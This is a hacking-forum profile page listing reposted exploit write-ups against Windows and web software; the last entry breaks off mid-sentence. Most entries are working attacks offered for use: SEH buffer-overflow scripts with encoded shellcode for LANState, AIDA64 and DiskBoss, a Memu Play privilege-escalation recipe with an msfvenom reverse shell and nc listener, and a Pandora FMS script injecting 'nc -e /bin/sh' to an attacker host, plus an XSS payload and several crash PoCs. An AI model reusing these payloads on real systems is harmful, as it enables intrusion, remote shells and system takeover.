Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: 10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH) # Date: 2020-04-01 # Exploit Author: Hodorsec # Version: v9.32 x86 # Software Link: https://www.10-strike.com/lanstate/lanstate-setup.exe # Vendor Homepage: https://www.freecommander.com # Tested on: Win7 x86 SP1 - Build 7601 # Description: # - Exploits the "Force Check" option when listing the Host Checks in option "Check List". Entering an overly long string, results in a crash which overwrites SEH. # Reproduction: # - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP's. # - Run the script, a TXT file will be generated # - On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c) # - Open LANState, use any "Map", for example the "demo_map" # - Click on tab "Home", click option "Check List" # - Rightclick on any existing hostname and click "Edit" # - Paste the value from clipboard in the field "Host address (name)" # - Next, Next, Finish # - In the "List of checks" overview, select the modified host and press the spacebar (Force Check) # - Check results # WinDBG initial crash output using only A's: # (c5c.c2c): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00002759 ebx=0012f838 ecx=000007f6 edx=0012f880 esi=0781bf78 edi=00130000 # eip=00402e57 esp=0012f7d8 ebp=0012f99c iopl=0 nv up ei pl nz na po nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202 # *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\10-Strike LANState\LANState.exe # LANState+0x2e57: # 00402e57 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] # 0:000> g # (c5c.c2c): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=0012f98c ebx=0012f98c ecx=05250858 edx=41414141 esi=00000002 edi=0012f7f0 # eip=004053e6 esp=0012f7f8 ebp=0012f99c iopl=0 nv up ei pl nz na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206 # LANState+0x53e6: # 004053e6 8b4af8 mov ecx,dword ptr [edx-8] ds:0023:41414139=???????? # 0:000> g # (c5c.c2c): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00000000 ebx=00000000 ecx=41414141 edx=77f0720d esi=00000000 edi=00000000 # eip=41414141 esp=0012f298 ebp=0012f2b8 iopl=0 nv up ei pl zr na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246 # 41414141 ?? ??? #!/usr/bin/python import sys,struct # Filename filename = "10_strike_lanstate-poc.txt" # Maximum length maxlen = 10000 # Shellcode, using alphanum chars due to bytes considered to be bad above \x7f # msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -v shellcode # Payload size: 447 bytes shellcode = ( "\xdb\xdc\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b" "\x4c\x78\x68\x6d\x52\x65\x50\x37\x70\x77\x70\x43\x50\x4d\x59" "\x39\x75\x36\x51\x59\x50\x32\x44\x6e\x6b\x32\x70\x46\x50\x6e" "\x6b\x70\x52\x34\x4c\x6e\x6b\x61\x42\x45\x44\x4c\x4b\x54\x32" "\x47\x58\x36\x6f\x6e\x57\x53\x7a\x66\x46\x46\x51\x79\x6f\x4e" "\x4c\x37\x4c\x51\x71\x53\x4c\x44\x42\x44\x6c\x61\x30\x4a\x61" "\x68\x4f\x66\x6d\x73\x31\x49\x57\x59\x72\x58\x72\x30\x52\x56" "\x37\x4e\x6b\x52\x72\x34\x50\x6c\x4b\x33\x7a\x35\x6c\x6c\x4b" "\x42\x6c\x57\x61\x74\x38\x6d\x33\x33\x78\x77\x71\x4b\x61\x32" "\x71\x6e\x6b\x51\x49\x77\x50\x76\x61\x6a\x73\x6e\x6b\x61\x59" "\x67\x68\x79\x73\x57\x4a\x42\x69\x4e\x6b\x37\x44\x6c\x4b\x43" "\x31\x4e\x36\x45\x61\x6b\x4f\x6c\x6c\x6a\x61\x48\x4f\x34\x4d" "\x47\x71\x5a\x67\x37\x48\x39\x70\x62\x55\x4b\x46\x65\x53\x63" "\x4d\x39\x68\x67\x4b\x73\x4d\x46\x44\x53\x45\x79\x74\x76\x38" "\x4c\x4b\x63\x68\x66\x44\x43\x31\x48\x53\x72\x46\x4e\x6b\x76" "\x6c\x70\x4b\x4e\x6b\x61\x48\x57\x6c\x46\x61\x79\x43\x6c\x4b" "\x54\x44\x6e\x6b\x57\x71\x68\x50\x6e\x69\x30\x44\x76\x44\x45" "\x74\x53\x6b\x61\x4b\x65\x31\x62\x79\x31\x4a\x30\x51\x39\x6f" "\x59\x70\x63\x6f\x71\x4f\x50\x5a\x6c\x4b\x56\x72\x4a\x4b\x6c" "\x4d\x73\x6d\x30\x6a\x77\x71\x6e\x6d\x4d\x55\x4e\x52\x37\x70" "\x75\x50\x63\x30\x52\x70\x63\x58\x56\x51\x4e\x6b\x42\x4f\x4e" "\x67\x69\x6f\x49\x45\x4d\x6b\x58\x70\x4d\x65\x6d\x72\x50\x56" "\x75\x38\x6e\x46\x6f\x65\x6f\x4d\x6d\x4d\x39\x6f\x58\x55\x75" "\x6c\x63\x36\x73\x4c\x76\x6a\x6b\x30\x59\x6b\x4d\x30\x52\x55" "\x74\x45\x6f\x4b\x43\x77\x42\x33\x63\x42\x62\x4f\x51\x7a\x77" "\x70\x73\x63\x69\x6f\x58\x55\x72\x43\x30\x61\x72\x4c\x31\x73" "\x46\x4e\x45\x35\x63\x48\x63\x55\x47\x70\x41\x41" ) # Offsets crash_ebp = 228 crash_nseh = 236 crash_seh = crash_nseh + 4 # Variables nops = "\x90" * 16 # Nops # Prefix prefix = "A" * crash_nseh # Filler nseh = "\x71\x06\x70\x04" # JNO # JO # Jump over NSEH/SEH seh = struct.pack("<L", 0x0132730f) # call dword ptr ss:[ebp-04] # [LANState.exe] suffix = nops # Old-school NOP'ing suffix += shellcode # Magic! suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix)) # Filler # Concatenate string for payload payload = prefix + nseh + seh + suffix # Put it all together try: file = open(filename,"wb") file.write(payload) file.close() print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully" except: print "[!] Error creating file!" sys.exit(0)
  2. HireHackking

    Memu Play 7.1.3 - Insecure Folder Permissions

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Memu Play 7.1.3 - Insecure Folder Permissions # Discovery by: chuyreds # Discovery Date: 2020-03-08 # Vendor Homepage: https://www.memuplay.com/ # Software Link : https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release # Tested Version: 7.1.3 # Vulnerability Type: Local # Tested on OS: Windows 10 Pro x64 es # Description: # Memu Play 7.1.3 suffers from Privilege Escalation due to insecure file permissions # Prerequisites # Local, Low privilege access with restart capabilities # Details # By default the Authenticated Users group has the modify permission to ESM folders/files as shown below. # A low privilege account is able to rename the MemuService.exe file located in this same path and replace # with a malicious file that would connect back to an attacking computer giving system level privileges # (nt authority\system) due to the service running as Local System. # While a low privilege user is unable to restart the service through the application, a restart of the # computer triggers the execution of the malicious file. C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe" C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F) BUILTIN\Administradores:(I)(F) BUILTIN\Usuarios:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX) Se procesaron correctamente 1 archivos; error al procesar 0 archivos C:\>sc qc MEmuSVC [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: MEmuSVC TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe" GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : MEmuSVC DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem # Proof of Concept 1. Generate malicious .exe on attacking machine msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe > /var/www/html/MemuService.exe 2. Setup listener and ensure apache is running on attacking machine nc -lvp 443 service apache2 start 3. Download malicious .exe on victim machine Open browser to http://192.168.1.130/MemuService.exe and download 4. Overwrite file and copy malicious .exe. Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\ 5. Restart victim machine 6. Reverse Shell on attacking machine opens C:\Windows\system32>whoami whoami nt authority\system
  3. HireHackking

    AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH) # Date: 2020-04-02 # Exploit Author: Hodorsec # Version: v6.20.5300 # Software Link: http://download.aida64.com/aida64engineer620.exe # Vendor Homepage: https://www.aida64.com/products/aida64-engineer # Tested on: Win7 x86 SP1 - Build 7601 # Description: # - Exploits the "Report File" buffer when sending an e-mail report via the Report wizard. Entering an overly long string, results in a crash which overwrites SEH. # Reproduction: # - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP's. # - Run the script, a TXT file will be generated # - On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c) # - Open AIDA64 Engineer # - First, click on "File", "Preferences" # - Click menu "Report", "Report File" # - Enter a long string in the field "File name" # - Set "File extension" to automatic, as by default # - Click OK # - Second, in the main menu, click "Report" which shows the "Report Wizard" # - Next, "System Summary only", next, "Plain Text", Finish # - Click the button "Send In E-mail" # - Check results # WinDBG initial crash output using only A's: # (994.998): Access violation - code c0000005 (!!! second chance !!!) # eax=03ac1048 ebx=03ac100c ecx=03ac109c edx=77f070f4 esi=03ac1140 edi=00000000 # eip=77f133a8 esp=03ac0fc8 ebp=03ac1000 iopl=0 nv up ei pl nz ac po nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212 # ntdll!RtlAcquireSRWLockShared+0x1a: # 77f133a8 8365f400 and dword ptr [ebp-0Ch],0 ss:0023:03ac0ff4=???????? #!/usr/bin/python import sys,struct filename = "aida64_engineer_poc.txt" # Maximum length maxlen = 5000 # Shellcode, using alphanum chars due to bytes considered to be bad above \x7f # msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -b '\x00\x0a\x0d' bufferregister=eax # Payload size: 440 bytes shellcode = ( "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b" "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" "\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x49\x78\x6d\x52\x33\x30" "\x45\x50\x45\x50\x53\x50\x6b\x39\x6d\x35\x36\x51\x49\x50\x43" "\x54\x6e\x6b\x52\x70\x54\x70\x6c\x4b\x51\x42\x66\x6c\x4c\x4b" "\x62\x72\x52\x34\x6e\x6b\x54\x32\x46\x48\x54\x4f\x6d\x67\x52" "\x6a\x57\x56\x36\x51\x6b\x4f\x4e\x4c\x47\x4c\x31\x71\x71\x6c" "\x53\x32\x36\x4c\x37\x50\x5a\x61\x6a\x6f\x54\x4d\x77\x71\x5a" "\x67\x7a\x42\x38\x72\x70\x52\x46\x37\x4e\x6b\x53\x62\x52\x30" "\x6c\x4b\x52\x6a\x47\x4c\x4c\x4b\x50\x4c\x67\x61\x51\x68\x78" "\x63\x43\x78\x56\x61\x4a\x71\x53\x61\x6c\x4b\x33\x69\x55\x70" "\x37\x71\x6a\x73\x4c\x4b\x43\x79\x72\x38\x49\x73\x46\x5a\x32" "\x69\x4c\x4b\x44\x74\x6e\x6b\x67\x71\x58\x56\x54\x71\x6b\x4f" "\x6e\x4c\x49\x51\x78\x4f\x44\x4d\x63\x31\x68\x47\x30\x38\x79" "\x70\x30\x75\x68\x76\x43\x33\x51\x6d\x69\x68\x75\x6b\x61\x6d" "\x74\x64\x44\x35\x78\x64\x52\x78\x6c\x4b\x73\x68\x74\x64\x57" "\x71\x68\x53\x31\x76\x4c\x4b\x46\x6c\x32\x6b\x6e\x6b\x76\x38" "\x47\x6c\x43\x31\x6b\x63\x6c\x4b\x33\x34\x6e\x6b\x46\x61\x38" "\x50\x4c\x49\x77\x34\x31\x34\x61\x34\x43\x6b\x71\x4b\x53\x51" "\x42\x79\x33\x6a\x62\x71\x6b\x4f\x4b\x50\x53\x6f\x61\x4f\x52" "\x7a\x4c\x4b\x62\x32\x68\x6b\x6c\x4d\x33\x6d\x51\x7a\x37\x71" "\x4e\x6d\x4d\x55\x38\x32\x75\x50\x77\x70\x63\x30\x50\x50\x55" "\x38\x66\x51\x6e\x6b\x62\x4f\x6c\x47\x39\x6f\x59\x45\x4f\x4b" "\x78\x70\x58\x35\x49\x32\x52\x76\x53\x58\x4c\x66\x6c\x55\x6d" "\x6d\x4d\x4d\x79\x6f\x59\x45\x65\x6c\x46\x66\x51\x6c\x64\x4a" "\x4f\x70\x39\x6b\x59\x70\x64\x35\x47\x75\x6d\x6b\x73\x77\x66" "\x73\x42\x52\x42\x4f\x62\x4a\x75\x50\x31\x43\x59\x6f\x5a\x75" "\x51\x73\x33\x51\x62\x4c\x55\x33\x46\x4e\x70\x65\x70\x78\x53" "\x55\x65\x50\x41\x41" ) # Align the registers # ESI = 04aaefc0, Buffer = 04abfb6c. Buffer - ESI = 0x010b8d align_eax = ( "\x56" # PUSH ESI "\x58" # POP EAX "\x66\x05\x3f\x10" # ADD AX,0x103f # EAX = 0x04aaffff "\x40" # INC EAX # EAX = 0x04ab0000 "\x66\x05\x01\x7F" # ADD AX,0x7f01 # EAX = 0x04ab7f01 "\x66\x05\x6b\x7c" # ADD AX,0x7c6b # EAX = 0x04abfb6c "\x50" # PUSH EAX ) # Offsets crash_ebp = 307 crash_esi = 1583 crash_seh = 319 crash_nseh = crash_seh - 4 # Variables ascii_nop = "\x47" # Doesn't do anything particular for this program nops = ascii_nop * 32 # ASCII NOP's amount # Prefix prefix = "A" * crash_nseh nseh = "\x71\x06\x70\x04" # JNO SHORT # JO SHORT # Jump over NSEH/SEH seh = struct.pack("<L", 0x0121076e) # POP POP RET # aida64.exe suffix = align_eax # Align registers to execute shellcode suffix += nops # Some ASCII friendly NOP's suffix += shellcode # Magic! suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix)) # Filler # Concatenate string for payload payload = prefix + nseh + seh + suffix # Put it all together try: file = open(filename,"wb") file.write(payload) file.close() print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully" except: print "[!] Error creating file!" sys.exit(0)
  4. HireHackking

    DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC) # Vendor Homepage: https://www.diskboss.com/ # Software Link Download: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe # Exploit Author: Paras Bhatia # Discovery Date: 2020-04-01 # Vulnerable Software: DiskBoss # Version: 7.7.14 # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) #Steps to Produce the Crash: # 1.- Run python code: DiskbossLCE.py # 2.- Copy content to clipboard # 3.- Turn off DEP for diskbsg.exe # 4.- Open "diskboss.exe" (diskbsg.exe) # 5.- Go to "Command" > Search Files # 6.- Click on second + icon (located at right side of "Search Disks, Directories and Network Shares") # 7.- Click on " Add Input Directory" # 8.- Paste ClipBoard into the "Directory" field # 9.- Click on OK # 10.- Calc.exe runs ################################################################################################################################################# #Python "DiskbossLCE.py" Code: f = open("DiskbossLCE.txt", "w") # Message= 0x650EA4CA : jmp ebx | [QtGui4.dll] (C:\Program Files\DiskBoss\bin\QtGui4.dll) jmpebx = "\xCA\xA4\x0E\x65" # msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed BufferRegister=EBX -f python -b "\x0a\x0d\x2f\x5c\x00" buf = "" buf += "\x53\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" buf += "\x79\x6c\x79\x78\x4e\x62\x73\x30\x63\x30\x67\x70\x73" buf += "\x50\x4f\x79\x48\x65\x56\x51\x59\x50\x31\x74\x6c\x4b" buf += "\x30\x50\x50\x30\x4c\x4b\x51\x42\x74\x4c\x6e\x6b\x51" buf += "\x42\x74\x54\x4c\x4b\x44\x32\x77\x58\x44\x4f\x4c\x77" buf += "\x70\x4a\x55\x76\x44\x71\x69\x6f\x4c\x6c\x45\x6c\x53" buf += "\x51\x73\x4c\x55\x52\x74\x6c\x31\x30\x49\x51\x4a\x6f" buf += "\x34\x4d\x43\x31\x7a\x67\x69\x72\x6c\x32\x72\x72\x71" buf += "\x47\x6c\x4b\x42\x72\x54\x50\x6c\x4b\x70\x4a\x65\x6c" buf += "\x4c\x4b\x70\x4c\x64\x51\x62\x58\x39\x73\x51\x58\x67" buf += "\x71\x38\x51\x66\x31\x4c\x4b\x31\x49\x31\x30\x33\x31" buf += "\x78\x53\x4c\x4b\x31\x59\x44\x58\x49\x73\x65\x6a\x51" buf += "\x59\x6e\x6b\x30\x34\x4e\x6b\x73\x31\x58\x56\x56\x51" buf += "\x4b\x4f\x6c\x6c\x5a\x61\x5a\x6f\x34\x4d\x65\x51\x58" buf += "\x47\x35\x68\x4d\x30\x30\x75\x58\x76\x55\x53\x31\x6d" buf += "\x49\x68\x45\x6b\x43\x4d\x74\x64\x32\x55\x4b\x54\x42" buf += "\x78\x6c\x4b\x51\x48\x46\x44\x57\x71\x48\x53\x62\x46" buf += "\x4e\x6b\x46\x6c\x50\x4b\x4c\x4b\x73\x68\x75\x4c\x43" buf += "\x31\x79\x43\x4e\x6b\x36\x64\x6c\x4b\x45\x51\x6e\x30" buf += "\x4e\x69\x30\x44\x56\x44\x57\x54\x51\x4b\x61\x4b\x73" buf += "\x51\x51\x49\x50\x5a\x50\x51\x4b\x4f\x6b\x50\x33\x6f" buf += "\x33\x6f\x72\x7a\x6c\x4b\x42\x32\x78\x6b\x4e\x6d\x31" buf += "\x4d\x50\x6a\x56\x61\x6e\x6d\x4b\x35\x38\x32\x43\x30" buf += "\x47\x70\x35\x50\x42\x70\x62\x48\x36\x51\x4e\x6b\x32" buf += "\x4f\x6d\x57\x49\x6f\x4e\x35\x6f\x4b\x7a\x50\x4d\x65" buf += "\x6c\x62\x32\x76\x71\x78\x6c\x66\x6e\x75\x4f\x4d\x6f" buf += "\x6d\x4b\x4f\x5a\x75\x65\x6c\x46\x66\x33\x4c\x66\x6a" buf += "\x6b\x30\x4b\x4b\x4d\x30\x53\x45\x34\x45\x4f\x4b\x53" buf += "\x77\x64\x53\x64\x32\x30\x6f\x42\x4a\x43\x30\x50\x53" buf += "\x59\x6f\x78\x55\x75\x33\x51\x71\x72\x4c\x73\x53\x36" buf += "\x4e\x55\x35\x74\x38\x71\x75\x47\x70\x41\x41" junk1 = "A" * 4096 junk2 = "C" * 1196 payload= junk1 + jmpebx + junk2 + buf f.write(payload) f.close()
  5. HireHackking

    Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution # Build: PC170324 - MR 0 # Date: 2020-03-30 # Exploit Author: Basim Alabdullah # Vendor homepage: http://pandorafms.org/ # Version: 7.0 # Software link: https://pandorafms.org/features/free-download-monitoring-software/ # Tested on: CentOS # # Authenticated Remote Code Execution # # Vulnerable file: extension/net_tools.php # Vulnerable Code: # # $traceroute = whereis_the_command ('traceroute'); # if (empty($traceroute)) { # ui_print_error_message(__('Traceroute executable does not exist.')); # } # else { # echo "<h3>".__("Traceroute to "). $ip. "</h3>"; # echo "<pre>"; # ----> echo system ("$traceroute $ip"); # echo "</pre>"; # # <?php error_reporting(0); $username = $argv[2]; $password = $argv[3]; $url = $argv[1]."/index.php?login=1"; $postinfo = "nick=".$username."&pass=".$password."&login_button=Login"; $attackerip = $argv[4]; $attackerport = $argv[5]; $payload="127.0.0.1;{nc,-e,/bin/sh,".$attackerip.",".$attackerport."}"; if(!empty($argv[1])) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_NOBODY, false); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.tmp"); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postinfo); curl_exec($ch); curl_close($ch); $ch1 = curl_init(); curl_setopt($ch1, CURLOPT_HEADER, false); curl_setopt($ch1, CURLOPT_NOBODY, false); curl_setopt($ch1, CURLOPT_URL, $argv[1]."/index.php?login=1&login=1&sec=estado&sec2=operation/agentes/ver_agente&tab=extension&id_agente=1&id_extension=network_tools"); curl_setopt($ch1, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch1, CURLOPT_COOKIEFILE, "cookie.tmp"); curl_setopt($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"); curl_setopt($ch1, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch1, CURLOPT_REFERER, $url); curl_setopt($ch1, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch1, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch1, CURLOPT_CUSTOMREQUEST, "POST"); curl_setopt($ch1, CURLOPT_POST, 1); curl_setopt($ch1, CURLOPT_POSTFIELDS, "operation=2&select_ips=".$payload."&community=public&submit=Execute"); curl_exec($ch1); curl_close($ch1); echo $payload."\n"; } else{ echo "\n\nphp exploit.php http://127.0.0.1/pandora_console/ username password attacker-ip attacker-port\n\n"; } ?> # # Persistent Cross-Site Scripting. # The value of the similar_ids request parameter is copied into the value of an HTML tag attribute which is an event handler and is encapsulated in double quotation marks. The payload 23859';document.location=1//981xgeu3m was submitted in the similar_ids parameter. This input was echoed as 23859&#039;;document.location=1//981xgeu3m in the application's response. # # GET /pandora_console/ajax.php?page=include%2Fajax%2Fevents&get_extended_event=1&group_rep=1&event_rep=1&dialog_page=general&similar_ids=2123859'%3bdocument.location%3d1%2f%2f981xgeu3m&timestamp_first=1585865889&timestamp_last=1585865889&user_comment=&event_id=21&server_id=0&meta=0&childrens_ids=%5B0%2C12%2C8%2C4%2C9%2C2%2C10%2C13%2C11%5D&history=0 # HTTP/1.1 # Host: pandorafms.host # User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0 # Accept: text/html, */*; q=0.01 # Accept-Language: en-US,en;q=0.5 # Accept-Encoding: gzip, deflate # Referer: http://pandorafms.host/pandora_console/index.php?sec=eventos&sec2=operation/events/events # X-Requested-With: XMLHttpRequest # Connection: close # Cookie: clippy_is_annoying=1; PHPSESSID=tn2pdl4p1qiq4bta26psj0mcj1
  6. HireHackking

    Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC) # Discovery by: 0xMoHassan # Date: 2020-04-04 # Vendor Homepage: http://www.nsauditor.com # Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe # Tested Version: 4.2.2.0 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows XP - SP3 # About App # Product Key Explorer is a powerful product key finder solution for Windows, designed to help users find, # recover and backup activation keys for +9000 popular software programs installed on local or network computers. # PoC # 1.Run the python script, it will create a new file "POC.txt" # 3.Run Product Key Explorer and click on "Register -> Enter Registration Code" # 2.Paste the content of POC.txt into the Field: 'Key' # 6.click 'ok' # 5.Magic happen :) #!/usr/bin/env python buff = "\x41" *500 buff += "\x41" * 500 try: f=open("POC.txt","w") print "[+] Creating %s bytes payload.." %len(buff) f.write(buff) f.close() print "[+] POC created!" except: print "POC cannot be created"
  7. HireHackking

    UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC) # Discovery by: chuyreds # Discovery Date: 2020-04-05 # Vendor Homepage: https://www.uvnc.com/ # Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0 # Tested Version: 1.2.4.0 # Vulnerability Type: Local # Tested on OS: Windows 10 Pro x64 es #Steps to produce the crash: #1.- Run python code: UltraVNC_1.2.40-Launcher_RepeaterHost.py #2.- Open UltraVNC_1.2.40-Launcher_RepeaterHost.txt and copy content to clipboard #3.- Open UltraVNC Launcher #4.- Select "Properties" #5.- In "Repeater host" Paste Clipboard #6.- Click on "OK" #7.- Crashed cod = "\x41" * 300 f = open('UltraVNC_1.2.40-Launcher_RepeaterHost.txt', 'w') f.write(cod) f.close()
  8. HireHackking

    Frigate 3.36 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Frigate 3.36 - Denial of Service (PoC) # Date: 2020-04-05 # Exploit Author: inter # Vendor Homepage: http://www.Frigate3.com/ # Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe # Vulnerable Software: Firgate # Version: 3.36 # Vulnerability Type: Denial of Service (DoS) Local # Tested on: Windows 7 Ultimate Service Pack 1 (64 bit - English) #Steps to Produce the Crash: # 1.- Run python code: crash.py # 2.- Copy content to clipboard # 3.- Open "Frigate3.exe" # 4.- Go to "Disk" > Find Computer # 5.- Paste ClipBoard into the "Computer Name:" field # 6.- Click on OK # 7.- Crashed #Python "crash.py" Code: buffer = "\x41" * 2000 f = open ("Frigate.txt", "w") f.write(buffer) f.close()
  9. HireHackking

    Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC) # Discovery by: 0xMoHassan # Date: 2020-04-04 # Vendor Homepage: http://www.nsauditor.com # Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe # Tested Version: 3.2.0.0 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows XP - SP3 # About App # Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities, # and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that # a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing # software significantly reduces the total cost of network management in enterprise environments by enabling # IT personnel and systems administrators gather a wide range of information from all the computers in the network without # installing server-side applications on these computers and create a report of potential problems that were found. # PoC # 1.Run the python script, it will create a new file "POC.txt" # 3.Run Nsauditor and click on "Register -> Enter Registration Code" # 2.Paste the content of POC.txt into the Field: 'Name' # 6.click 'ok' # 5.Magic happen :) #!/usr/bin/env python buff = "\x41" *500 buff += "\x41" * 500 try: f=open("POC.txt","w") print "[+] Creating %s bytes payload.." %len(buff) f.write(buff) f.close() print "[+] POC created!" except: print "POC cannot be created"
  10. HireHackking

    SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC) # Exploit Author: 0xMoHassan # Date: 2020-04-04 # Vendor Homepage: https://www.spotauditor.com/ # Software Link: http://www.nsauditor.com/downloads/spotauditor_setup.exe # Tested Version: 5.3.4 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows XP - SP3 # About App # SpotAuditor is an advanced password recovery solution. The software recovers over 40 popular programs passwords, # including passwords saved Google Chrome, Internet Explorer, Firefox and Opera browsers, Microsoft Office Outlook # smtp and pop passwords, Hotmail password, Facebook password, Gmail password, Yahoo password, Aol password, 20 # top FTP program passwords, recovers saved passwords hidden behind of asterisks on dialogs and web forms. # PoC # 1.Run the python script, it will create a new file "POC.txt" # 3.Run SpotAuditor and click on "Register -> Enter Registration Code" # 2.Paste the content of POC.txt into the Field: 